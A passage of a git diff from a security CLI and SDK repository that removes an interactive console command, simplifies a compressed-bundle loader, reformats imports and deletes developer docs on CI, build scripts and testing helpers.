borderColor: focused === 'gray' ? '#7B5FBF' : '#3F3F3F', - borderLeft: true, - borderRight: true, - borderStyle: 'single', - borderTop: true, - flexDirection: 'column', - flexGrow: 0, - flexShrink: 0, - height: Math.max(5, Math.min(Math.floor(consoleHeight * 0.85), 25)), - paddingX: 1, - paddingY: 0, - }, - // Check if showing default text. - (() => { - const nonEmptyMessages = messages.filter(msg => msg.text.length > 0) - if (nonEmptyMessages.length === 0) { - return createElement( - Text, - { color: focused === 'gray' ? 
'#B0B0B0' : '#5A5A5A' }, - 'Waiting for command output…', - ) - } - - // Apply scroll offset: show messages from start up to (length - offset). - // Limit to max 21 visible messages to prevent height overflow. - const maxVisibleMessages = 21 - const visibleMessages = nonEmptyMessages.slice( - Math.max( - 0, - nonEmptyMessages.length - - maxVisibleMessages - - grayBoxScrollOffset, - ), - nonEmptyMessages.length - grayBoxScrollOffset, - ) - const currentPosition = Math.max( - 1, - nonEmptyMessages.length - grayBoxScrollOffset, - ) - const totalMessages = nonEmptyMessages.length - - return createElement( - Box, - { - flexDirection: 'column', - flexShrink: 0, - height: '100%', - minWidth: 0, - }, - // Scrollable content area (grows to fill available space). - createElement( - Box, - { flexDirection: 'column', flexGrow: 1, minWidth: 0 }, - ...visibleMessages.map((msg, i) => { - const isCommandOutput = - !msg.text.startsWith('>') && - !msg.text.includes('→') && - !msg.text.includes('✓') && - !msg.text.includes('✗') - const isFocused = focused === 'gray' - return createElement( - Text, - { - key: i, - color: isFocused - ? isCommandOutput - ? '#86EFAC' - : '#B0B0B0' - : isCommandOutput - ? '#86EFAC' - : '#5A5A5A', - }, - msg.text, - ) - }), - ), - // Footer with scroll position indicator and navigation hint (stays at bottom). - createElement( - Box, - { - flexDirection: 'row', - justifyContent: 'space-between', - width: '100%', - }, - createElement( - Text, - { color: focused === 'gray' ? '#7B5FBF' : '#3A3A3A' }, - `[${currentPosition}/${totalMessages}]`, - ), - createElement( - Text, - { color: focused === 'gray' ? '#7B5FBF' : '#3A3A3A' }, - '↑/↓', - ), - ), - ) - })(), - ) - : null, - - // Input at bottom. - createElement(InputArea, { - commandHistory, - height: inputHeight, - isFocused: focused === 'input', - onHeightChange: handleInputHeightChange, - onSubmit: handleInputSubmit, - }), - - // Status bar at very bottom. 
- createElement(StatusBar, { ctrlCPressed }), - ) -} - -// Export memoized version to prevent unnecessary re-renders. -export const InteractiveConsoleApp = memo(InteractiveConsoleAppComponent) diff --git a/packages/cli/src/commands/console/cmd-console.mts b/packages/cli/src/commands/console/cmd-console.mts deleted file mode 100644 index d36cd721c..000000000 --- a/packages/cli/src/commands/console/cmd-console.mts +++ /dev/null @@ -1,73 +0,0 @@ -import { handleConsole } from './handle-console.mts' -import { commonFlags } from '../../flags.mts' -import { meowOrExit } from '../../utils/cli/with-subcommands.mjs' -import { - getFlagApiRequirementsOutput, - getFlagListOutput, -} from '../../utils/output/formatting.mts' - -import type { - CliCommandConfig, - CliCommandContext, -} from '../../utils/cli/with-subcommands.mjs' - -export const CMD_NAME = 'console' - -const description = 'Interactive console with AI-powered natural language' - -const hidden = false - -export const cmdConsole = { - description, - hidden, - run, -} - -async function run( - argv: string[] | readonly string[], - importMeta: ImportMeta, - { parentName }: CliCommandContext, -): Promise { - const config: CliCommandConfig = { - commandName: CMD_NAME, - description, - flags: { - ...commonFlags, - banner: { - type: 'boolean', - default: false, - description: 'Hide the banner at startup.', - hidden: true, - }, - }, - help: (command, config) => ` - Usage - $ ${command} - - API Token Requirements - ${getFlagApiRequirementsOutput(`${parentName}:${CMD_NAME}`)} - - Options - ${getFlagListOutput(config.flags)} - - Examples - $ ${command} - - Tips - - Ask questions in natural language - - Use Tab to switch between console and input - - Press Shift+Enter for multi-line input - - Press Ctrl-C again to exit - `, - hidden, - } - - meowOrExit({ - argv, - config, - importMeta, - parentName, - }) - - await handleConsole() -} diff --git a/packages/cli/src/commands/console/handle-console.mts 
b/packages/cli/src/commands/console/handle-console.mts deleted file mode 100644 index 6d5d040e3..000000000 --- a/packages/cli/src/commands/console/handle-console.mts +++ /dev/null @@ -1,339 +0,0 @@ -import { render } from 'ink' -import { createElement } from 'react' -import colors from 'yoctocolors-cjs' - -import { spawn } from '@socketsecurity/lib-internal/spawn' - -import { - createFileDiff, - InteractiveConsoleApp, -} from './InteractiveConsoleApp.js' -import { parseIntent } from '../ask/handle-ask.mts' - -import type { ConsoleMessage } from './InteractiveConsoleApp.js' - -// Read package.json for version info. -async function getVersionInfo(): Promise<{ - version: string - buildHash?: string - devMode: boolean -}> { - try { - const pkgPath = new URL('../../../package.json', import.meta.url) - const { default: pkg } = await import(pkgPath.href, { - with: { type: 'json' }, - }) - return { - buildHash: process.env['SOCKET_CLI_BUILD_HASH'] || 'local', - devMode: process.env['NODE_ENV'] === 'development', - version: pkg.version || 'dev', - } - } catch (_e) { - return { - buildHash: 'local', - devMode: true, - version: 'dev', - } - } -} - -/** - * Set up raw mode for keyboard input (without mouse tracking). - * Note: Mouse tracking is incompatible with terminal text selection. - * Use Tab to switch focus instead of clicking. - */ -function setupRawMode(): void { - // Note: Ink handles keyboard input via useInput, so raw mode setup is minimal. - // The terminal is already in the right state for Ink's input handling. - // This function is kept for potential future extensions. -} - -/** - * Restore terminal to normal mode. - */ -function restoreTerminalMode(): void { - // Terminal restoration is handled by Ink automatically. - // This function is kept for potential future extensions. -} - -/** - * Handle console command - launches interactive TUI. - */ -export async function handleConsole(): Promise { - // Switch to alternate screen buffer and hide cursor. 
- process.stdout.write('\x1B[?1049h\x1B[?25l') - - // Set up raw mode and mouse tracking. - setupRawMode() - - // Get version info. - const versionInfo = await getVersionInfo() - - // Command handler - executes both console commands and socket commands. - const handleCommand = async ( - command: string, - addMessage: (textOrMessage: string | ConsoleMessage) => void, - ) => { - try { - // Special demo commands. - if (command.trim() === 'demo diff') { - addMessage(`${colors.cyan('→')} Demo: Socket optimize preview`) - addMessage('') - - // Simulate package.json before optimization. - const beforePackageJson = `{ - "name": "my-app", - "version": "1.0.0", - "dependencies": { - "lodash": "^4.17.21", - "moment": "^2.29.4", - "chalk": "^4.1.2" - } -}` - - // Simulate package.json after optimization. - const afterPackageJson = `{ - "name": "my-app", - "version": "1.0.0", - "dependencies": { - "lodash-es": "^4.17.21", - "date-fns": "^3.0.0", - "@socketsecurity/registry#chalk": "^5.3.0" - } -}` - - const diffLines = createFileDiff(beforePackageJson, afterPackageJson) - - // Add message with diff. - addMessage({ - diff: diffLines, - text: '📦 package.json', - timestamp: new Date(), - }) - - addMessage('') - addMessage({ - dimmed: true, - text: ` ${colors.dim('lodash → lodash-es (tree-shakeable, saves ~45KB)')}`, - timestamp: new Date(), - }) - addMessage({ - dimmed: true, - text: ` ${colors.dim('moment → date-fns (smaller bundle, better tree-shaking)')}`, - timestamp: new Date(), - }) - addMessage({ - dimmed: true, - text: ` ${colors.dim('chalk → @socketsecurity/registry#chalk (Socket registry, verified safe)')}`, - timestamp: new Date(), - }) - addMessage('') - addMessage(`${colors.green('✓')} Demo completed`) - addMessage('') - return - } - - // Parse command. - const args = command.trim().split(/\s+/) - if (args.length === 0) { - return - } - - const firstArg = args[0]! - - // Determine if this is a socket command or console command. 
- const socketCommands = [ - 'analytics', - 'audit-log', - 'ci', - 'config', - 'fix', - 'install', - 'login', - 'logout', - 'manifest', - 'npm', - 'npx', - 'optimize', - 'organization', - 'package', - 'patch', - 'pip', - 'pnpm', - 'repository', - 'scan', - 'threat-feed', - 'uninstall', - 'whoami', - 'wrapper', - 'yarn', - ] - - // Common console commands that should execute directly. - const consoleCommands = [ - 'ls', - 'pwd', - 'cd', - 'echo', - 'cat', - 'grep', - 'find', - 'ps', - 'top', - 'kill', - 'env', - 'export', - 'alias', - 'history', - 'clear', - 'exit', - 'mkdir', - 'rm', - 'cp', - 'mv', - 'touch', - 'chmod', - 'chown', - 'which', - 'curl', - 'wget', - 'git', - 'node', - 'npm', - 'pnpm', - 'yarn', - ] - - let isSocketCommand = socketCommands.includes(firstArg) - const isConsoleCommand = consoleCommands.includes(firstArg) - - // If not a known command, try AI parsing for natural language. - if (!isSocketCommand && !isConsoleCommand) { - try { - const intent = await parseIntent(command) - // Only use AI if confidence is high. - if (intent && intent.confidence > 0.6) { - addMessage( - `${colors.blue('ℹ')} Interpreted as: ${intent.explanation} (${Math.round(intent.confidence * 100)}% confident)`, - ) - isSocketCommand = true - // Use AI-parsed command. - args.length = 0 - args.push(...intent.command) - } - } catch (_e) { - // AI parsing failed, continue with direct command. - } - } - - if (isSocketCommand) { - // Execute as socket command. - addMessage(`${colors.cyan('→')} Executing: socket ${args.join(' ')}`) - - const result = await spawn('socket', args, { - cwd: process.cwd(), - stdio: 'pipe', - }) - - // Add stdout output. - if (result.stdout) { - const lines = result.stdout?.toString().trim().split('\n') ?? [] - for (const line of lines) { - addMessage(line) - } - } - - // Add stderr output. - if (result.stderr) { - const lines = ( - typeof result.stderr === 'string' - ? 
result.stderr - : result.stderr.toString() - ) - .trim() - .split('\n') - for (const line of lines) { - addMessage(`${colors.red('✗')} ${line}`) - } - } - - if (result.code !== 0) { - addMessage( - `${colors.red('✗')} Command failed with exit code ${result.code}`, - ) - } else { - addMessage(`${colors.green('✓')} Command completed successfully`) - } - } else { - // Execute as console command (ls, pwd, etc). - addMessage(`${colors.cyan('→')} Executing: ${command}`) - - const result = await spawn(firstArg, args.slice(1), { - cwd: process.cwd(), - stdio: 'pipe', - }) - - // Add stdout output. - if (result.stdout) { - const lines = result.stdout?.toString().trim().split('\n') ?? [] - for (const line of lines) { - addMessage(line) - } - } - - // Add stderr output. - if (result.stderr) { - const lines = ( - typeof result.stderr === 'string' - ? result.stderr - : result.stderr.toString() - ) - .trim() - .split('\n') - for (const line of lines) { - addMessage(`${colors.red('✗')} ${line}`) - } - } - - if (result.code !== 0) { - addMessage( - `${colors.red('✗')} Command failed with exit code ${result.code}`, - ) - } else { - addMessage(`${colors.green('✓')} Command completed`) - } - } - - // Add spacing after command output. - addMessage('') - } catch (e) { - addMessage( - `${colors.red('✗')} Error executing command: ${(e as Error).message}`, - ) - addMessage('') - } - } - - // Render the interactive console with Ctrl+C handling disabled (we handle it ourselves). - const renderInstance = render( - createElement(InteractiveConsoleApp, { - ...versionInfo, - onCommand: handleCommand, - }), - { - exitOnCtrlC: false, - patchConsole: false, - debug: false, - }, - ) - - // Wait for exit. - try { - await renderInstance.waitUntilExit() - } finally { - renderInstance.unmount() - // Restore terminal mode and show cursor and exit alternate screen. 
- restoreTerminalMode() - process.stdout.write('\x1B[?25h\x1B[?1049l') - } -} diff --git a/packages/cli/src/commands/console/mouse-handler.mts b/packages/cli/src/commands/console/mouse-handler.mts deleted file mode 100644 index 689b869b3..000000000 --- a/packages/cli/src/commands/console/mouse-handler.mts +++ /dev/null @@ -1,79 +0,0 @@ -/** - * @fileoverview Mouse event handling for raw mode terminal input. - * - * Parses ANSI mouse tracking escape sequences and provides click detection. - * Supports SGR (Select Graphic Rendition) mouse mode encoding. - */ - -export interface MouseEvent { - button: number - x: number - y: number - type: 'down' | 'up' | 'move' - shift: boolean - alt: boolean - ctrl: boolean -} - -/** - * Parse SGR mouse mode escape sequence. - * Format: \x1b[M or \x1b[m - * With modifiers (SGR extended): shift adds 4, alt adds 8, ctrl adds 16. - * Example: \x1b[<0;10;5;M for left click at column 10, row 5. - * Example: \x1b[<4;10;5;M for shift+left click (button 0+4 for shift). - */ -export function parseMouseEvent(sequence: string): MouseEvent | null { - // Match SGR format: \x1b[M/m. - const match = sequence.match(/\x1b\[<(\d+);(\d+);(\d+);?[Mm]/) - if (!match) { - return null - } - - const button = Number.parseInt(match[1]!, 10) - const x = Number.parseInt(match[2]!, 10) - const y = Number.parseInt(match[3]!, 10) - - // Extract modifiers from button code (SGR extended format). - // Shift = 4, Alt = 8, Ctrl = 16. - const shift = (button & 4) !== 0 - const alt = (button & 8) !== 0 - const ctrl = (button & 16) !== 0 - - // Determine event type based on button code. - // Button 64+ indicates movement, 96+ indicates release. - let type: 'down' | 'up' | 'move' = 'down' - if (button >= 96) { - type = 'up' - } else if (button >= 64) { - type = 'move' - } - - return { - alt, - button: button % 64, - ctrl, - shift, - type, - x, - y, - } -} - -/** - * Check if a click occurred within a given box region. 
- */ -export function isClickInRegion( - mouseEvent: MouseEvent, - x: number, - y: number, - width: number, - height: number, -): boolean { - return ( - mouseEvent.type === 'down' && - mouseEvent.x >= x && - mouseEvent.x < x + width && - mouseEvent.y >= y && - mouseEvent.y < y + height - ) -} diff --git a/packages/cli/src/commands/json/output-cmd-json.mts b/packages/cli/src/commands/json/output-cmd-json.mts index d12f2d8aa..2ebf62142 100644 --- a/packages/cli/src/commands/json/output-cmd-json.mts +++ b/packages/cli/src/commands/json/output-cmd-json.mts @@ -1,7 +1,10 @@ import { existsSync } from 'node:fs' import path from 'node:path' -import { safeReadFileSync, safeStatsSync } from '@socketsecurity/lib-internal/fs' +import { + safeReadFileSync, + safeStatsSync, +} from '@socketsecurity/lib-internal/fs' import { getDefaultLogger } from '@socketsecurity/lib-internal/logger' import { REDACTED } from '../../constants/cli.mts' diff --git a/packages/cli/src/commands/login/attempt-login.mts b/packages/cli/src/commands/login/attempt-login.mts index 11f3c5ab4..41d9afcb6 100644 --- a/packages/cli/src/commands/login/attempt-login.mts +++ b/packages/cli/src/commands/login/attempt-login.mts @@ -1,7 +1,11 @@ import { joinAnd } from '@socketsecurity/lib-internal/arrays' import { SOCKET_PUBLIC_API_TOKEN } from '@socketsecurity/lib-internal/constants/socket' import { getDefaultLogger } from '@socketsecurity/lib-internal/logger' -import { confirm, password, select } from '@socketsecurity/lib-internal/stdio/prompts' +import { + confirm, + password, + select, +} from '@socketsecurity/lib-internal/stdio/prompts' import { applyLogin } from './apply-login.mts' import { diff --git a/packages/cli/src/index.mts b/packages/cli/src/index.mts index 76c6e60c1..6ce3cfc58 100644 --- a/packages/cli/src/index.mts +++ b/packages/cli/src/index.mts @@ -1,48 +1,14 @@ /** - * Brotli-compressed CLI loader. - * Decompresses dist/cli.js.bz and executes it. 
- * - * This loader allows the CLI to be distributed as a compressed file, - * reducing npm package size from ~13MB to ~1.7MB. + * CLI loader entry point. + * Loads and executes the CLI bundle. * * Note: Written as CommonJS to avoid import.meta issues. Shebang added by esbuild banner. */ // CommonJS globals are available since we're outputting to CJS format. -const { readFileSync, unlinkSync, writeFileSync } = require('node:fs') -const Module = require('node:module') const path = require('node:path') -const { brotliDecompressSync } = require('node:zlib') - -const { safeMkdirSync } = require('@socketsecurity/lib/fs') - -const cliBzPath = path.join(__dirname, 'cli.js.bz') -const buildPath = path.join(__dirname, '..', 'build') - -// Read and decompress. -const compressed = readFileSync(cliBzPath) -const decompressed = brotliDecompressSync(compressed) - -// Ensure build/ directory exists. -safeMkdirSync(buildPath, { recursive: true }) - -// Write to build/ directory (gitignored, local to package). -const tempCliPath = path.join(buildPath, `cli-runtime-${process.pid}.js`) -writeFileSync(tempCliPath, decompressed) -try { - // Create a new module and set its paths to resolve from the CLI package directory. - const cliModule = new Module(tempCliPath, module.parent) - cliModule.filename = tempCliPath - cliModule.paths = Module._nodeModulePaths(__dirname) +const cliPath = path.join(__dirname, 'cli.js') - // Load and execute the CLI module. - cliModule._compile(decompressed.toString('utf-8'), tempCliPath) -} finally { - // Clean up temp file. - try { - unlinkSync(tempCliPath) - } catch { - // Ignore cleanup errors. - } -} +// Load and execute the CLI module. 
+require(cliPath) diff --git a/packages/cli/src/utils/spawn/spawn-node.mts b/packages/cli/src/utils/spawn/spawn-node.mts index f4af3f962..ad0d75543 100644 --- a/packages/cli/src/utils/spawn/spawn-node.mts +++ b/packages/cli/src/utils/spawn/spawn-node.mts @@ -21,7 +21,7 @@ import { which } from '@socketsecurity/lib/bin' import { getExecPath } from '@socketsecurity/lib/constants/node' -import { spawn } from '@socketsecurity/lib/spawn' +import { spawn, spawnSync } from '@socketsecurity/lib/spawn' import { ensureIpcInStdio } from '../../shadow/stdio-ipc.mjs' import { sendBootstrapHandshake } from '../sea/boot.mjs' @@ -161,6 +161,8 @@ export async function findSystemNodejs(): Promise { * * Note: IPC handshake is not supported in synchronous mode, * so this should only be used when IPC is not required. + * Also note that SEA system Node.js detection is not available + * in synchronous mode - falls back to getExecPath(). * * @param args - Arguments to pass to Node.js * @param options - Spawn options (ipc field is ignored) @@ -170,7 +172,6 @@ export function spawnNodeSync( args: string[] | readonly string[], options?: Omit, ): ReturnType { - const { spawnSync } = require('@socketsecurity/lib/spawn') - const nodePath = getNodeExecutablePath() + const nodePath = getExecPath() return spawnSync(nodePath, args, options) } diff --git a/packages/cli/test/unit/commands/fix/ghsa-tracker.test.mts b/packages/cli/test/unit/commands/fix/ghsa-tracker.test.mts index 6d947b4b7..9cebaecaf 100644 --- a/packages/cli/test/unit/commands/fix/ghsa-tracker.test.mts +++ b/packages/cli/test/unit/commands/fix/ghsa-tracker.test.mts @@ -123,7 +123,9 @@ describe('ghsa-tracker', () => { describe('saveGhsaTracker', () => { it('saves tracker to file', async () => { - const { safeMkdir, writeJson } = await import('@socketsecurity/lib-internal/fs') + const { safeMkdir, writeJson } = await import( + '@socketsecurity/lib-internal/fs' + ) const tracker: GhsaTracker = { version: 1, fixed: [ @@ -149,7 +151,9 @@ 
describe('ghsa-tracker', () => { describe('markGhsaFixed', () => { it('adds new GHSA fix record', async () => { - const { readJson, writeJson } = await import('@socketsecurity/lib-internal/fs') + const { readJson, writeJson } = await import( + '@socketsecurity/lib-internal/fs' + ) const existingTracker: GhsaTracker = { version: 1, fixed: [], @@ -176,7 +180,9 @@ describe('ghsa-tracker', () => { }) it('replaces existing GHSA fix record', async () => { - const { readJson, writeJson } = await import('@socketsecurity/lib-internal/fs') + const { readJson, writeJson } = await import( + '@socketsecurity/lib-internal/fs' + ) const existingTracker: GhsaTracker = { version: 1, fixed: [ @@ -213,7 +219,9 @@ describe('ghsa-tracker', () => { }) it('sorts records by fixedAt descending', async () => { - const { readJson, writeJson } = await import('@socketsecurity/lib-internal/fs') + const { readJson, writeJson } = await import( + '@socketsecurity/lib-internal/fs' + ) const existingTracker: GhsaTracker = { version: 1, fixed: [ diff --git a/packages/sdk/docs/dev/ci-testing.md b/packages/sdk/docs/dev/ci-testing.md deleted file mode 100644 index 52f56d588..000000000 --- a/packages/sdk/docs/dev/ci-testing.md +++ /dev/null @@ -1,137 +0,0 @@ -# CI Testing - -This project uses socket-registry's centralized CI testing infrastructure. 
- -## Critical Requirements - -**🚨 MANDATORY:** Use full commit SHA, NOT `@main` - -```yaml -uses: SocketDev/socket-registry/.github/workflows/ci.yml@662bbcab1b7533e24ba8e3446cffd8a7e5f7617e # main -``` - -Get SHA: `cd /path/to/socket-registry && git rev-parse main` - -## Workflow Configuration - -Located at `.github/workflows/test.yml`: - -```yaml -jobs: - test: - uses: SocketDev/socket-registry/.github/workflows/ci.yml@ # main - with: - setup-script: 'pnpm run build' - node-versions: '[20, 22, 24]' - os-versions: '["ubuntu-latest", "windows-latest"]' - test-script: 'pnpm run test-ci' - lint-script: 'pnpm run check:lint' - type-check-script: 'pnpm run check:tsc' - timeout-minutes: 10 -``` - -## Key Features - -- Matrix testing across Node.js versions and OSes -- Parallel execution (lint, type-check, test, coverage) -- Configurable scripts, timeouts, and artifacts -- Memory optimization (8GB CI, 4GB local) -- Cross-platform compatibility - -## Configuration Options - -| Parameter | Description | Default | -|-----------|-------------|---------| -| `node-versions` | Node.js versions array | `[20, 22, 24]` | -| `os-versions` | Operating systems | `["ubuntu-latest", "windows-latest"]` | -| `test-script` | Test command | `pnpm run test-ci` | -| `setup-script` | Pre-test setup | `''` | -| `timeout-minutes` | Job timeout | `10` | -| `upload-artifacts` | Upload test artifacts | `false` | -| `fail-fast` | Cancel on failure | `true` | - -## Test Scripts - -**Custom test runner** (`scripts/test.mjs`): -- Glob pattern expansion -- Force flag support -- Memory optimization (auto heap size) -- Cross-platform support (Windows `.cmd` handling) - -**Usage:** -```bash -# Run all tests -pnpm run test:run - -# Run with force flag -node scripts/test.mjs --force - -# Run specific pattern -node scripts/test.mjs test/unit/*.test.mts -``` - -## Memory Configuration - -Auto-configured by test runner: -- CI: 8GB heap (`--max-old-space-size=8192`) -- Local: 4GB heap 
(`--max-old-space-size=4096`) -- Semi-space: 512MB for GC - -Defined in: -1. `scripts/test.mjs` (custom runner) -2. `.env.test` (vitest direct) -3. `vitest.config.mts` (pool config) - -## Environment Variables - -| Variable | Purpose | -|----------|---------| -| `CI` | Detect CI environment | -| `FORCE_TEST` | Force all tests | -| `PRE_COMMIT` | Detect pre-commit hook | -| `NODE_OPTIONS` | Node.js runtime options | - -## Local Testing - -```bash -# Full suite -pnpm test - -# With coverage -pnpm run test:unit:coverage - -# Coverage percentage -pnpm run coverage:percent - -# Custom runner -pnpm run test:run -``` - -## Troubleshooting - -**Out of memory:** -1. Check `NODE_OPTIONS` in `.env.test` -2. Verify vitest pool configuration -3. Reduce `max-parallel` in workflow - -**Windows issues:** -1. Ensure paths use `path.join()` -2. Check `.cmd` file handling -3. Verify `shell: true` for Windows spawns - -**Timeouts:** -1. Increase `timeout-minutes` -2. Check `testTimeout` in `vitest.config.mts` -3. Review individual test timeouts - -## Best Practices - -1. **Use centralized CI workflow** with full SHA -2. **Set appropriate timeouts** for test suite size -3. **Optimize memory** for large suites (sequential execution, single fork) -4. **Enable debug mode** for troubleshooting: `debug: '1'` - -## See Also - -- [Testing Utilities](./testing.md) - Test helpers documentation -- socket-registry CI workflow: `SocketDev/socket-registry/.github/workflows/ci.yml` diff --git a/packages/sdk/docs/dev/scripts.md b/packages/sdk/docs/dev/scripts.md deleted file mode 100644 index ba6ceda47..000000000 --- a/packages/sdk/docs/dev/scripts.md +++ /dev/null @@ -1,181 +0,0 @@ -# Script Organization - -Complex scripts are extracted to Node.js `.mjs` files in `scripts/` for better maintainability and cross-platform compatibility. 
- -## Benefits - -- **Customization**: Flags, conditional logic, complex workflows -- **Maintainability**: Easier to read, test, and modify -- **Cross-platform**: Consistent across Windows, macOS, Linux -- **Error handling**: Proper exit codes and messages -- **Reusability**: Shared utilities - -## Directory Structure - -``` -scripts/ -├── utils/ -│ ├── run-command.mjs # Command execution -│ └── path-helpers.mjs # Path utilities -├── build.mjs # Build orchestration -├── clean.mjs # Clean artifacts -├── check.mjs # Quality checks -├── lint-fix.mjs # Auto-fix linting -├── coverage.mjs # Coverage collection -└── test.mjs # Test runner -``` - -## Core Utilities - -### `run-command.mjs` - -```javascript -import { runCommand, runSequence, runParallel } from './utils/run-command.mjs' - -// Single command -await runCommand('rollup', ['-c', 'rollup.config.mjs']) - -// Sequential -await runSequence([ - { command: 'pnpm', args: ['run', 'clean'] }, - { command: 'rollup', args: ['-c'] } -]) - -// Parallel -await runParallel([ - { command: 'pnpm', args: ['run', 'lint'] }, - { command: 'pnpm', args: ['run', 'check:tsc'] } -]) -``` - -## Main Scripts - -### `build.mjs` - -Build with optional flags: -- `--src-only`: Build source only -- `--types-only`: Build types only -- `--watch`: Watch mode with incremental builds - -```json -{ - "scripts": { - "build": "node scripts/build.mjs", - "build:dist:src": "node scripts/build.mjs --src-only" - } -} -``` - -### `clean.mjs` - -Clean artifacts with granular control: -- `--cache`: Cache directories only -- `--coverage`: Coverage reports only -- `--dist`: Dist directory only -- `--all`: Everything (default) - -```json -{ - "scripts": { - "clean": "node scripts/clean.mjs", - "clean:cache": "node scripts/clean.mjs --cache" - } -} -``` - -### `check.mjs` - -Run quality checks in parallel: -- TypeScript type checking -- ESLint linting - -```json -{ - "scripts": { - "check": "node scripts/check.mjs" - } -} -``` - -### `lint-fix.mjs` - -Run 
linters with auto-fix sequentially: -1. oxlint -2. biome -3. eslint - -```json -{ - "scripts": { - "fix": "node scripts/lint-fix.mjs" - } -} -``` - -## Before vs After - -### Before (Inline Scripts) -```json -{ - "scripts": { - "build:dist": "pnpm run build:dist:src && pnpm run build:dist:types", - "clean": "run-s -c clean:*", - "lint:fix": "run-s -c lint:fix:oxlint lint:fix:biome lint:fix:eslint" - } -} -``` - -**Issues:** Hard to customize, limited error handling, verbose, difficult to test - -### After (Node.js Scripts) -```json -{ - "scripts": { - "build": "node scripts/build.mjs", - "build:dist:src": "node scripts/build.mjs --src-only", - "clean": "node scripts/clean.mjs", - "fix": "node scripts/lint-fix.mjs" - } -} -``` - -**Benefits:** Easy flags, proper error handling, cross-platform, testable - -## Best Practices - -1. **Meaningful flags**: `--src-only`, not `-s` -2. **JSDoc comments**: Document parameters -3. **Graceful errors**: Proper exit codes -4. **Log progress**: Use logger -5. **Focused scripts**: One responsibility -6. **Composability**: Scripts can call scripts -7. **Avoid shell: true**: Pass args as arrays -8. **Test edge cases**: Missing files, wrong flags - -## Common Patterns - -**Conditional execution:** -```javascript -if (condition) await runCommand('cmd', ['arg']) -``` - -**Sequential with early exit:** -```javascript -const exitCode = await runSequence([...]) -if (exitCode !== 0) process.exitCode = exitCode -``` - -**Parallel execution:** -```javascript -const exitCodes = await runParallel([...]) -const failed = exitCodes.some(code => code !== 0) -``` - -## Migration Steps - -1. Copy `scripts/utils/` to your project -2. Identify complex scripts in `package.json` -3. Create `.mjs` files for each -4. Update `package.json` to reference new scripts -5. Test all scripts -6. 
Update CI/CD if needed diff --git a/packages/sdk/docs/dev/testing.md b/packages/sdk/docs/dev/testing.md deleted file mode 100644 index 67b7c34a9..000000000 --- a/packages/sdk/docs/dev/testing.md +++ /dev/null @@ -1,464 +0,0 @@ -# Testing Guide - -Comprehensive guide for testing Socket SDK - includes setup, utilities, patterns, and best practices. - -## Quick Start - -| Task | Command | -|------|---------| -| **Run all tests** | `pnpm test` | -| **Run specific file** | `pnpm run test:run path/to/file.test.mts` | -| **Run with coverage** | `pnpm run cover` | -| **Coverage percentage** | `pnpm run coverage:percent` | - -```typescript -import { describe, expect, it } from 'vitest' -import { setupTestClient } from './utils/environment.mts' -import nock from 'nock' - -describe('SocketSdk - Feature Name', () => { - const getClient = setupTestClient('test-api-token', { retries: 0 }) - - it('should do something specific', async () => { - // Arrange: Setup mock - nock('https://api.socket.dev') - .get('/v0/endpoint') - .reply(200, { ok: true }) - - // Act: Call method - const result = await getClient().method() - - // Assert: Check result - expect(result.success).toBe(true) - if (result.success) { - expect(result.data.ok).toBe(true) - } - }) -}) -``` - ---- - -## Test Helpers - -**Location:** `test/utils/environment.mts` - -| Helper | Use Case | Auto Cleanup | -|--------|----------|--------------| -| **`setupTestClient()`** | Most tests - combines nock + client | ✓ | -| **`setupTestEnvironment()`** | Custom SDK instances needed | ✓ | -| **`createTestClient()`** | Unit tests, no HTTP mocking | ✗ | -| **`isCoverageMode`** | Detect coverage mode | N/A | - -### `setupTestClient(token?, options?)` - RECOMMENDED - -Combines nock setup and client creation with automatic cleanup. 
- -```typescript -const getClient = setupTestClient('test-token', { retries: 0 }) -// ✓ Automatic nock lifecycle -// ✓ Fresh client per test -// ✓ No cleanup boilerplate -``` - -**When to use:** 90% of SDK tests - -### `setupTestEnvironment()` - -Nock environment setup without client creation. - -```typescript -setupTestEnvironment() -const client = new SocketSdk('custom-config') -``` - -**When to use:** Manual control over client creation needed - -### `createTestClient(token?, options?)` - -Client creation without automatic environment setup. - -```typescript -const client = createTestClient('test-token', { retries: 0 }) -``` - -**When to use:** Unit tests without HTTP mocking - -### `isCoverageMode` - -Boolean flag for coverage detection. - -```typescript -import { isCoverageMode } from './utils/environment.mts' - -if (isCoverageMode) { - // Adjust test behavior -} -``` - -### Helper Selection Guide - -``` -What do you need? -│ -├─ Fresh SDK instance per test with HTTP mocking? -│ └─ ✓ setupTestClient() -│ -├─ Custom SDK configuration with HTTP mocking? -│ └─ ✓ setupTestEnvironment() + new SocketSdk() -│ -├─ Unit test without HTTP mocking? -│ └─ ✓ createTestClient() -│ -└─ Testing SDK initialization? - └─ ✓ createTestClient() or new SocketSdk() -``` - ---- - -## Public Testing Utilities - -Exported from `@socketsecurity/sdk/testing` for external use. 
- -### Response Builders - -```typescript -import { - mockSuccessResponse, - mockErrorResponse, - mockApiErrorBody, - mockSdkError -} from '@socketsecurity/sdk/testing' - -// Success response -mockSuccessResponse({ id: '123' }, 200) -// → { success: true, status: 200, data: { id: '123' } } - -// Error response -mockErrorResponse('Not found', 404) -// → { success: false, status: 404, error: 'Not found' } - -// API error body (for nock) -mockApiErrorBody('Repository not found') -// → { error: { message: 'Repository not found' } } - -// Common errors -mockSdkError('NOT_FOUND') // status: 404 -mockSdkError('UNAUTHORIZED') // status: 401 -mockSdkError('SERVER_ERROR') // status: 500 -``` - -### Fixtures - -```typescript -import { fixtures } from '@socketsecurity/sdk/testing' - -// Organizations -fixtures.organizations.basic // { id, name, plan } -fixtures.organizations.full // + timestamps - -// Repositories -fixtures.repositories.basic // { id, name, archived, default_branch } -fixtures.repositories.full // + homepage, visibility, timestamps - -// Scans -fixtures.scans.pending // { id, status: 'pending' } -fixtures.scans.completed // + completed_at -fixtures.scans.withIssues // issues_found > 0 - -// Packages -fixtures.packages.safe // { score: 95 } -fixtures.packages.vulnerable // { score: 45 } -fixtures.packages.malware // { score: 0 } -``` - -### Type Guards - -```typescript -import { isSuccessResult, isErrorResult } from '@socketsecurity/sdk/testing' - -if (isSuccessResult(result)) { - console.log(result.data) // Type-safe access -} - -if (isErrorResult(result)) { - console.log(result.error) // Type-safe access -} -``` - ---- - -## Test Structure & Organization - -### File Organization - -``` -test/ -├── *.test.mts # Test files -└── utils/ # Shared utilities - ├── environment.mts # Test helpers - └── README.md # Utilities documentation -``` - -### Naming Conventions - -| Element | Convention | Example | -|---------|-----------|---------| -| **Files** | 
